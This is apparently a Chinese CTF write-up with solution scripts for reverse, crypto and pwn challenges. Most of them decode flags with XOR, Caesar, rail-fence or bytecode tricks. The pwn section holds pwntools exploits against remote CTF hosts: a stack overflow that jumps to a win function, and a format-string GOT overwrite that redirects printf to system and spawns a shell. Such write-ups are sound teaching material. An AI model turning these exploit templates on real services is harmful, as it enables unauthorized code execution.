WEB

sql_search

sqlmap一把梭

re

import struct
import hashlib

# 还原密码
data = struct.pack("<I", 276121201)
data += struct.pack("<I", 2084991057)
data += struct.pack("<I", 353440529)
data += struct.pack("<H", 25346)
data += b"\x00"

data = data[:14]
pwd = bytes([b ^ 0x23 for b in data])

print("password:", pwd)

# 生成 flag
s = b"admin:" + pwd
md5 = hashlib.md5(s).hexdigest()

print("flag:", f"flag{{{md5}}}")

练习二

exp：

def decrypt_string(hex_input):
    # Step 1: Convert the hex string back to a list of integers (bytes)
    try:
        encrypted_bytes = bytes.fromhex(hex_input)
    except ValueError:
        return "Error: Invalid hex string!"

    # Step 2: XOR each byte with 0x50 to undo the second transformation
    xored_chars = [chr(b ^ 0x50) for b in encrypted_bytes]

    # Step 3: Reverse the Caesar Cipher by shifting backward by 7
    decrypted = []
    for char in xored_chars:
        if char.isalpha():
            # Determine if we are working with uppercase or lowercase
            base = ord('a') if char.islower() else ord('A')
            
            # Shift backward by 7. 
            # The modulo 26 (% 26) handles wrapping around the alphabet.
            original_char = chr((ord(char) - base - 7) % 26 + base)
            decrypted.append(original_char)
        else:
            # Numbers and symbols (like {} ) were untouched, so leave them alone
            decrypted.append(char)
            
    return "".join(decrypted)

# --- Test it out ---
# This is the hex string from our previous example
hex_target = "1d23383e2b3132332d"

print(f"Encrypted Hex: {hex_target}")
print(f"Decrypted Text: {decrypt_string(hex_target)}")

练习三

def decrypt_xor_flag(hex_input):
    key = "secret"
    
    # 1. Convert the hex string to raw bytes
    try:
        encrypted_bytes = bytes.fromhex(hex_input)
    except ValueError:
        return "Error: Invalid hex string!"
        
    decrypted = []
    
    # 2. XOR each byte with the repeating key
    for i, byte_val in enumerate(encrypted_bytes):
        # Find the corresponding character in the key using modulo
        key_char = key[i % len(key)]
        
        # XOR the byte with the ASCII value of the key character
        decrypted_char = chr(byte_val ^ ord(key_char))
        decrypted.append(decrypted_char)
        
    return "".join(decrypted)

# --- Example Usage ---
# Let's pretend the program spit out this hex string:
hex_target = "150912050016390a1011071d0e1b1007"

print(f"Encrypted Hex: {hex_target}")
print(f"Decrypted Flag: {decrypt_xor_flag(hex_target)}")

# -*- coding: utf-8 -*-
from Crypto.Cipher import DES
from Crypto.Util.Padding import pad
import sys

# 固定密钥，必须为8字节
key = b'12345678'

# 创建DES加密器（ECB模式）
cipher = DES.new(key, DES.MODE_ECB)

# 提示用户输入 flag
print("please put your flag:", end='', flush=True)
flag = sys.stdin.readline().rstrip('\n')

# 将输入转为字节，并进行PKCS7填充（DES要求数据长度是8的倍数）
plaintext = flag.encode('utf-8')
padded_plaintext = pad(plaintext, DES.block_size)  # block_size = 8

# 加密
ciphertext = cipher.encrypt(padded_plaintext)

# 输出十六进制格式的密文
print("Encrypted (hex):", ciphertext.hex())

新春守护者

# The raw bytecode you dumped (with the missing 0x10 added back)
bytecode = [
    0x10, 0x0, 0x20, 0x66, 0x30, 0x1, 0x40, 0x7, 0x10, 0x1, 0x20, 0x66, 0x30, 
    0x1, 0x40, 0x18, 0x10, 0x2, 0x20, 0x66, 0x30, 0x1, 0x40, 0x40, 0x10, 0x3, 
    0x20, 0x66, 0x30, 0x1, 0x40, 0x29, 0x10, 0x4, 0x20, 0x66, 0x30, 0x1, 0x40, 
    0x23, 0x10, 0x5, 0x20, 0x66, 0x30, 0x1, 0x40, 0xa, 0x10, 0x6, 0x20, 0x66, 
    0x30, 0x1, 0x40, 0x40, 0x10, 0x7, 0x20, 0x66, 0x30, 0x1, 0x40, 0x29, 0x10, 
    0x8, 0x20, 0x66, 0x30, 0x1, 0x40, 0x1f, 0x10, 0x9, 0x20, 0x66, 0x30, 0x1, 
    0x40, 0xa, 0x10, 0xa, 0x20, 0x66, 0x30, 0x1, 0x40, 0x3, 0x10, 0xb, 0x20, 
    0x66, 0x30, 0x1, 0x40, 0xa, 0x10, 0xc, 0x20, 0x66, 0x30, 0x1, 0x40, 0x1d, 
    0x10, 0xd, 0x20, 0x66, 0x30, 0x1, 0x40, 0x7, 0x10, 0xe, 0x20, 0x66, 0x30, 
    0x1, 0x40, 0xa, 0x10, 0xf, 0x20, 0x66, 0x30, 0x1, 0x40, 0x29, 0x10, 0x10, 
    0x20, 0x66, 0x30, 0x1, 0x40, 0x2, 0x10, 0x11, 0x20, 0x66, 0x30, 0x1, 0x40, 
    0x18, 0x10, 0x12, 0x20, 0x66, 0x30, 0x1, 0x40, 0xa, 0x10, 0x13, 0x20, 0x66, 
    0x30, 0x1, 0x40, 0x29, 0xff
]

flag = ""

# Loop through the bytecode in chunks of 8 bytes (1 block per character)
for i in range(0, len(bytecode) - 1, 8):
    # The target byte is always the 8th byte in the block (index 7)
    target = bytecode[i + 7]
    
    # Reverse the math: (target - 1) ^ 0x66
    original_char = (target - 1) ^ 0x66
    flag += chr(original_char)

print(f"Decoded inner flag: {flag}")
print(f"Full flag submission: flag{{{flag}}}")

聪明的大开门

Crypto

RC4的密钥流泄露

根据RC4流密码特性（同一密钥生成固定密钥流，明文⊕密钥流=密文，异或可逆），使用已知明文-密文对直接推导密钥流：

已知明文字节（P，前22字节）：TestData_ForRC4_Decryp（对应ASCII字节：54 65 73 74 44 61 74 61 5F 46 6F 72 52 43 34 5F 44 65 63 72 79 70）
对应密文字节（C）：完全相同（54 65 73 74 44 61 74 61 5F 46 6F 72 52 43 34 5F 44 65 63 72 79 70）

逐字节异或计算密钥流：
P[i] ⊕ C[i] = 00（全零流，共22字节）。
目标密文（C_flag，20字节）：66 6C 61 67 7B 70 6F 6C 61 72 5F 6B 69 6E 67 6B 69 6E 67 7D
使用前20字节密钥流（全零）解密：
C_flag[i] ⊕ 00 = C_flag[i]（即原字节不变）。
解密结果（ASCII）：flag{polar_kingking}

百万赏金

exp：

import string

cipher = "DFGNBSZNGNMKFF"

# -----------------------------
# 凯撒解密
# -----------------------------
def caesar_decrypt(text, shift):
    res = ""
    for c in text:
        if c.isalpha():
            base = ord('A') if c.isupper() else ord('a')
            res += chr((ord(c) - base - shift) % 26 + base)
        else:
            res += c
    return res

# -----------------------------
# Rail Fence 解密（W型）
# -----------------------------
def rail_fence_decrypt(cipher, key):
    rail = [['\n' for _ in range(len(cipher))] for _ in range(key)]

    dir_down = None
    row, col = 0, 0

    # 标记轨迹
    for i in range(len(cipher)):
        if row == 0:
            dir_down = True
        if row == key - 1:
            dir_down = False

        rail[row][col] = '*'
        col += 1

        row += 1 if dir_down else -1

    # 填充密文
    index = 0
    for i in range(key):
        for j in range(len(cipher)):
            if rail[i][j] == '*' and index < len(cipher):
                rail[i][j] = cipher[index]
                index += 1

    # 读取明文
    result = []
    row, col = 0, 0
    for i in range(len(cipher)):
        if row == 0:
            dir_down = True
        if row == key - 1:
            dir_down = False

        if rail[row][col] != '\n':
            result.append(rail[row][col])
            col += 1

        row += 1 if dir_down else -1

    return "".join(result)

# -----------------------------
# 爆破
# -----------------------------
for key in range(2, 5):
    rf_dec = rail_fence_decrypt(cipher, key)

    for shift in range(1, 11):
        plain = caesar_decrypt(rf_dec, shift)

        # 过滤可疑flag
        if "flag" in plain.lower() or "ctf" in plain.lower():
            print(f"[+] Found => key={key}, shift={shift}, result={plain}")

        # 如果不确定格式，可以全打印
        print(f"key={key}, shift={shift}, result={plain}")

PWN

Z99

from pwn import *

context.binary = elf = ELF('./pwn3', checksec=False)
p = remote('1.95.7.68',2064)     

payload1 = b'A' * 0x28 + p64(elf.sym['z99'])   # 0x60108c
payload2 = b'\x11'

p.sendline(payload1)
p.sendline(payload2)
p.interactive()

one_hundred

from pwn import *
p = remote("1.95.7.68",2145)
# p=process("./pwn1")
def gg(p):
    gdb.attach(p)
    pause()
elf=ELF("./pwn1")
context.log_level="debug"
# p.recvline()
n=0x0804A06C
payload1=fmtstr_payload(4,{n:100})
p.send(payload1)
p.recvline()
system=elf.plt["system"]
printf=elf.got["printf"]
payload2=fmtstr_payload(4,{printf:system})
p.send(payload2)
p.interactive()

WEB

sql_search

re

EZ_Login

练习二

练习三

新春守护者

聪明的大开门

Crypto

RC4的密钥流泄露

百万赏金

PWN

Z99

one_hundred